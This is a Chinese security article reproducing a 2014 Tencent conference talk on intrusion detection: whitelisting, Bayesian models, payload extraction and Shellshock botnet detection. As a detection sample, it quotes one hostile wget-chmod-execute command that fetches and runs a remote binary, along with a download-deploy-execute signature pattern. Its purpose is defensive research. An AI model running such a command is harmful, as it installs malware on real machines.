掘金安全数据-腾讯安全数据运营实践

2014-11-30 20,080

简介:

1.对于入侵检测规则建设难点的思考;
2.如何利用历史案例和数据运营手段完善检测能力;
3.如何通过分析安全数据发现僵尸网络、建立ip信誉库,以及shellshock 蠕虫检测实践;
4.总结现有系统的局限性,以及对开放合作的展望。

xtiger_8

安全工作的困境

1)建设的系统 ==>我们的能力 ==>能力 = 积累==>我们的局限=系统的局限==>怎么破!? ==>向数据学习==> 唯快不破

xtiger_1

2 )防住漏洞就能阻断入侵?

  • 社工入\弱口令\撞库入侵算漏洞吗?
  • 无鉴权的管理后台\ACL不严算漏洞吗?
  • 入侵检测! =漏洞检测

3) 1day能否及时感知?

  • 通过口口相传,江湖传闻?
  • 等各安全资讯网站发布消息?看新闻?
  • 检测能力的更新速度取决于对威胁的感知速度

 

我们有什么?

• 几十万台服务器?
•NO ,在我眼里这是几十万个蜜罐
• 200T+/天 安全数据

  •  亿次攻击请求
    Web攻击
    扫描
    暴力破解
    木马

 

如何理解安全数据

• 基础运维审计数据

DB审计
运维命令

入侵检测系统告警数据

• IDS\IPS

• 可疑行为

• 黑客行为
• 违规操作

• 扫描数据

• 端口扫描\暴力破解\WAF

 

提炼运维数据

• 小型网络\单一业务特点

• 运维习惯(命令)固定
• 代码风格(CGI文件)固定
• DB (sql )操作固定

• Discuz\wordpress…

• 如何快速甄别异常

• 非我们熟悉的行为均为异常

• 提炼熟悉的行为

• 白名单        非白即黑

xtiger_3

 

运维数据白名单

• 文件MD5

• Tripwire

• 命令

• 参数\ 目录\用户\时间

• Sql语句

• 语法树解析(sqlparse )

xtiger_4

Sql白名单

• 开源系统

• 固定sql语句,仅参数变化

xtiger_5

• Sql注入

• 联合查询-payload依附于业务逻辑sql语句中
• 多分支查询-payload希望获取业务数据之外的内容

• 白名单模型

• Srcip+user+function+parameter

xtiger_6

 

 

白名单优劣

• 学习周期过长
• 滞后性-增量数据易误报
• 适用于某些特定业务\核心业务

• 结论

• 单一系统缺陷由多系统配合弥补(白加黑)
业务种类较多的网络不适用

xtiger_7

 

历史案例说明了什么

• 那些无法定性的可疑事件有价值吗?

• 下载外网文件\编译文件

xtiger_9
• 非漏洞非木马恶意行为如何检测?

• 通过弱口令进入系统 dump数据
• 编译部署一个文件传输工具
• Wget->解压->执行

• 步骤一定是相同的吗?

• 固化的关联规则还有其他组合方式吗?如何穷尽?

xtiger_8

 

贝叶斯

• 贝叶斯决策理论方法是统计模型决策中的一个基本方法

• 假定B1,B2,……是某个过程的若干可能的前提,则P(Bi)是人们事先对各前提条件出现可能性大小的估计,称之为先验概率。如果这个过程得到了一个结果A ,那么贝叶斯公式提供了我们根据A的出现而对前提条件做出新评价的方法。P(Bi∣A)即是对以A为前提下Bi的出现概率的重新认识,称 P(Bi∣A)为后验概率。

• 算法:贝叶斯
• 样本:历史案例,运维数据

xtiger_10

算法

• A=入侵概率
• B=运维操作概率
• N联合概率 =入侵事件
• 周期性自主纠偏

xtiger_11

 

贝叶斯的问题

•不同业务场景不同风险不同

• 场景举例:

• mysqldump 在web前端机与DB服务器风险级别不同
• ssh登陆失败 在内网和外网风险级别不同

• 腾讯云业务:管理服务对外,用户运维工具各异,开源CMS漏洞各异
• 腾讯自有业务:运维流程规范,web是入侵主要入口
不同的场景和业务需分别建模

• 样本严重不足,怎么办?
主动分析对手

xtiger_12

榨取安全数据价值-分析对手

• 如何向对手学习更多

• 拓展数据分析纬度
• 闭环运营

• 循环迭代,完善监测规则

xtiger_13

如何挖掘-识别对手

• 识别对手

• UA

• 扫描器:版权\版本声明

• COOKIE

• NULL | 固定值 |  (伪)随机参数

• PAYLOAD

• 固定回显字符串

• 来源

• 大范围扫描触发规则
• 已知对手的固定来源IP
• Spam list

xtiger_14

 

Payload提取

• 数据精炼

• 解包\参数拆解
• 符合粗规则的参数范围
• 固化或符合随机规律的payload

xtiger_15

 Payload提取-场景

• 攻击场景相关

• Sql注入
xtiger_16
• 僵尸网络
xtiger_17

• 语言相关

• Php代码注入
xtiger_18
• Java代码注入
xtiger_19
• Xml
xtiger_20

• APP相关

• 开源cms 库表
• CGI\cookie\parameter

 

识别1Days

• Webapp指纹 +payload= (0/1/N)day
xtiger_21
• 通用漏洞影响范围

• 猜猜这都是什么开源系统?

• 通用攻击手法影响范围

• Jsp\php 代码注入 ?Sql注入?

xtiger_22

 

识别1day的意义

• 自动及时捕获1day

避免人为因素导致的信息滞后

• 及时建立防护解决方案

• 自身业务开源APP
• 腾讯云商户使用的主流APP

• 自身业务

• Discuz
• struts

• 云商户

• Dedecms
• Phpcms
• Wdcp
• other …

Shellshock 漏洞

• 现在的趋势:漏洞披露->大范围攻击爆发 几乎0时差

xtiger_23

Shellshock Worm

• (2014-09-25 11:20:27)发现 Thanks-Rob Worm

• (2014-09-25 22:35:44)国内僵尸网络节点

•(2014-09-26 )各种变种满天飞

xtiger_24

如何发现僵尸网络

• 僵尸网络常见架构

• 数据(payload )特点

• 僵尸网络提取逻辑

xtiger_25

 

如何发现的shellshock蠕虫?

• 历史漏洞检测规则(如:PHP-CGI RCE )

• WAF数据Payload分析

wget -P /tmp http://1.1.1.1/arm;chmod +x /tmp/arm;/tmp/arm

• 对手:僵尸网络特征

• 下载(wget\curl…) + 部署(tar\chmod..) + 执行(/tmp\perl\php)

• 发现Thanks-Rob

xtiger_26

运营数据

• Shellshock 僵尸网络趋势

• 新的僵尸网络不断涌现

xtiger_27
• 僵尸网络特点:

• 盈利模式:挖矿\偷比特币\ DDOS

xtiger_28
• 开发语言:Perl\php\python\java\c\c++\Go 语言蠕虫

xtiger_30
• 平台:armeabi\arm\ppc\mips\x86\nodes\sig

xtiger_29
• 对检测能力的帮助

5条单点规则优化
10条贝叶斯子规则优化

识别僵尸网络的意义

• 1day及时感知

• 假设应急人员在休假,安全系统如何感知和更新新型攻击 ?

• 研究僵尸网络手法工具

• 更新恶意行为特征库
• 黑客工具特征与行为研究

• IP信誉库

• 及时更新ACL

 

够了吗?

• 再大的量也只是整个互联网的一个小数点
• 如何将安全网编织得更大?

 

开放&合作

• 定期僵尸网络\恶意IP\蠕虫

• 僵尸网络蠕虫分析分享

• 合作剿灭僵尸网络,控制影响

• IP信誉库
• 蠕虫事件同步
• 0/1day攻击事件同步

xtiger_31

 

总结

• 本议题探讨一类学习方法,通过数据自动学习提升安全系统能力

• 兵马未动粮草先行                兵马未动情报先行
• 大中型网络攻防双方的对抗有演化成数据优势竞争的趋势

xtiger_29

 

江虎(xti9er)

腾讯高级安全工程师 《掘金安全数据-腾讯安全数据运营实践》

讲师简介:拥有10多年安全研究与从业经验。2010年加入腾讯,在入侵检测体系建设、应急响应、安全培训方面有独到的见解。

课程简介:

1.对于入侵检测规则建设难点的思考;
2.如何利用历史案例和数据运营手段完善检测能力;
3.如何通过分析安全数据发现僵尸网络、建立ip信誉库,以及shellshock 蠕虫检测实践;
4.总结现有系统的局限性,以及对开放合作的展望。

【本文是2014WOT技术峰会深圳站 腾讯安全平台部江虎 演讲的《掘金安全数据-腾讯安全数据运营实践》

pdf下载地址戳这里《掘金安全数据-腾讯安全数据运营实践》 SP小编整理发布】

本文作者:SP小编

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/2509.html

Tags:
评论  (2)
快来写下你的想法吧!

SP小编

文章数:209 积分: 25

交流和分享以及愉快的玩耍

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号